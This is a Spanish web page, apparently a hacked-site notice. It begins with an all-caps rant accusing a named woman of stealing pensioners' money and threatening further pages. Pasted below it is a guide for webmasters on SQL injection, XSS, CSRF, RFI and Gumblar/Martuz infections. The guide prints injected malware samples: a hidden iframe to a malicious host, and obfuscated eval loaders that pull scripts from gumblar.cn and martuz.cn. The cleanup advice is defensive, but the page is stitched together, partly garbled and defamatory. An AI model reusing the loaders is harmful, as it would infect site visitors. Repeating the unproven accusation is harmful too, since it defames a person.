***

ESTO ESTA DEDICADO A LOS ATACANTE QUE SEGURO SILVIA RAMIRES - HABRA PAGADO PARA SACARNOS DE CIRCULACION - MUCHACHO A ESTA CONCHUDA TIENE MAS $4.000.000 DE LA PLATA DE LOS JUBILADO ES LA GRAN BOLSIQUEDADO O  JAQUER DE LAS CARTERA DE LOS VIEJOS - NOSOTROS ESTAMOS EN CONTRA - NO INTENTE CUANDO INTENTA ABRIREMOS OTRA PAGINA TENEMOS LA INFORMACION SUBIDA  TARDAMO 2 HS  PARA SABER QUE LO ENCONTRAMOS EN LA RED DE REDES  - ESA NO LA SABEN - LENVIAMOS SACADO DE INTERNET PARA QUE OBSERVEN QUE NO SOMOS PELOTUDOS - ESTAMOS EN CONTRA DE ESTOS PORQUE SE TRATA DE NUESTROS SERES QUERIDO QUE ESTA H.P LO HA CAGADO - LA TENEMOS CLARA

·          

·          

·         Inyección SQL.- Este ataque se aprovecha de una vulnerabilidad en que una variable o componente de una página que utiliza código SQL (código que accede bases de datos) permite que un atacante emplee comandos para manipular datos y acceder información confidencial.

·         XSS o Cross Site Scripting.- En español, secuencias de comandos en sitios cruzados. Este ataque aprovecha vulnerabilidades en las páginas de Internet que permiten que un cibercriminal inserte código de JavaScript o lenguajes similares para inyectar código HTML en las páginas que atacan, alterando así la funcionalidad de la misma.

·         CSRF o Cross Site Request Forgery.- En español, falsificación de petición en sitios cruzados. Este ataque consiste en que el navegador de Internet de una víctima es forzado a enviar una solicitud a una página de Internet a la que la víctima tiene acceso o a la que ya se le ha autorizado su acceso. Por ejemplo: si tu haces clic en un enlace malicioso, y la página de Internet de tu banco dejó una cookie autorizándote acceso, el enlace malicioso podría enviar una solicitud a la página de tu banco. Puedes prevenir este tipo de ataques si sales (logout) de las páginas bancarias después de haberlas utilizado.

·         RFI o Remote File Inclusion.- En español, inclusión remota de archivos. Este ataque existe en páginas escritas en el lenguaje PHP (enlace en inglés) que están escritas de forma descuidada y que permiten el enlace a archivos ubicados en otras computadoras. La inclusión de archivos pudiera resultar en ejecución de código malicioso.

En los últimos años el ataque más común ha sido el de inyección SQL, que ha sido usando por grupos de hackers famosos, como LulzSec o Anonymous. Otro ataque que ha crecido significativamente en los últimos años es el de XSS.

Inyección de código y ataques al sitio web

En la actualidad se dan muchos casos de sitios webs que aparecen como infectados a causa de la aparición de un código javascript o iframe que el webmaster no ha añadió en su sitio web y provoca que su sitio sea considerado como infectado con la consecuencia de ser potencialmente peligroso para los visitantes y ser considerado como tal por buscadores como Google que puede llevar a bloquear nuestro sitio en sus listados de búsqueda indicando que la web  se encuentra infectada por un troyano o malware.

Este tipo de inyecciones de código normalmente se producen en:

- Sitios web basados en aplicaciones open source (wordpress, joomla, foros …) que contienen bugs o fallos de seguridad y que el webmaster no ha actualizado a su última versión (recordemos que la mayoría de actualizaciones menores están destinadas a corregir fallos de seguridad en estas aplicaciones).

- Directamente a través de FTP, cuando el atacante consigue los datos ftp del alojamiento web, entonces el atacante accede directamente con los datos correctos vía FTP y descarga todos los ficheros html, php, htm… y los vuelve a cargar de forma automática con el código javascript o iframe a cada fichero.

 Los datos FTP los puede conseguir a través de virus o troyanos que infectan el PC del usuario a través vulnerabilidades en software instalado en el ordenador que no está actualizado (player de flash, adobre reader, navegador de internet …), de manera que cuando el ordenador está infectado el troyano busca códigos ftp en el ordenador y los utiliza para inyectar el iframe en los documentos del sitio web.

Las páginas web que se ven afectados con más frecuencia son las del tipo index.php, index.htm, index.html, pero en ocasiones, en el caso de que el sitio web sea dinámico y  esté basado en plantillas, tpls etc (foros, blogs, wikis, cms) pueden verse afectados todos los archivos del sitio.

La forma más habitual de infección es la inyección de un iframe en el/los documentos html que componen el sitio.

Ejemplos de códigos maliciosos inyectados son:

<iframe src=”http://webmaliciosa:8080/index.php” mce_src=”http:// webmaliciosa:8080/index.php” width=107 height=152 style=”visibility: hidden”></ifram e>

O códigos más complejos como:

(function(jil){var xR5p=’%’;eval(unes..cape((’var”20a”3d”22Sc”72iptEngin”65″22″2c….”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(docdumen″2ecookie”2e”6ddfa9ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2fdd”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).rep lace(jifdsfel,xR5p)))})(/”/g)

En la mayoría de los casos la función no tiene nombre, es anónima y de autollamada. Estas acciones son provocadas por troyanos del tipo Gumblar, Martuz o variantes de los mismos.

¿Como debo proceder para prevenir y/o eliminar la infección?

- Vacíe la caché de su navegador.

- Desactive la caché de su navegador.

- Actualice los programas Adobe Acrobat Reader y Adobe Flash Player –

- Actualice su antivirus y haga un análisis completo de su ordenador

- Limpie el código malicioso, buscándolo en todas las páginas que conforman su sitio web y eliminando las líneas de código con aspecto similar a:

(function(){var G33z1=’%’;var KlKj=’va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-adfaads69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-2626(type-6ff-28z-72vzts)-21-3dty-70e-6f ++++++++++++++++++++++++++++  0/index.php” mce_src=”http:// webmaliciosa:8080/index.php” width=107 height=152 style=”visibility: hidden”></i frame> __________________________________________________________________________________________var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;

if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzssfs)!=typeof(”A”))){
zrvz+++++++++++++++++++al(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
document.w rite(”<script src=//martu”+”z.cn/vid/?id=”+j+”><\/scrip t>”);}

La búsqueda del código malicioso, si el sitio web está compuesto por una gran cantidad de documentos puede ser una labor muy tediosa, para hacerlo algo más cómodo puede buscar en todo el sitio web automáticamente con su editor web por cadenas de palabras, por ejemplo:

Buscar en todo el sitio las palabras

Iframe

script src =” Martuz for-like

visibility: hidden

Cuando encuentre estas líneas de código, fíjese en ellas y si no han sido introducidas por usted, elimínelas de su código fuente en todos aquellos documentos de su web en los que estén presentes.

Una vez limpiado el código de su sitio web, recuerde CAMBIAR LA CONTRASEÑA FTP y solicitar a cualquier otra persona que haya tenido acceso a su hosting mediante ftp (diseñador web, programador …) que realice las mismas acciones.

Guarda tus contraseñas en un gestor de contraseñas como Any Password (gratuito) y no las almacenes en tu correo o en archivos de texto, word o excel en tu ordenador.

LA MEJOR FORMAR ES ENTRAR EN WNDOU EN TEM Y LIMPIAR TODO COMO KOXI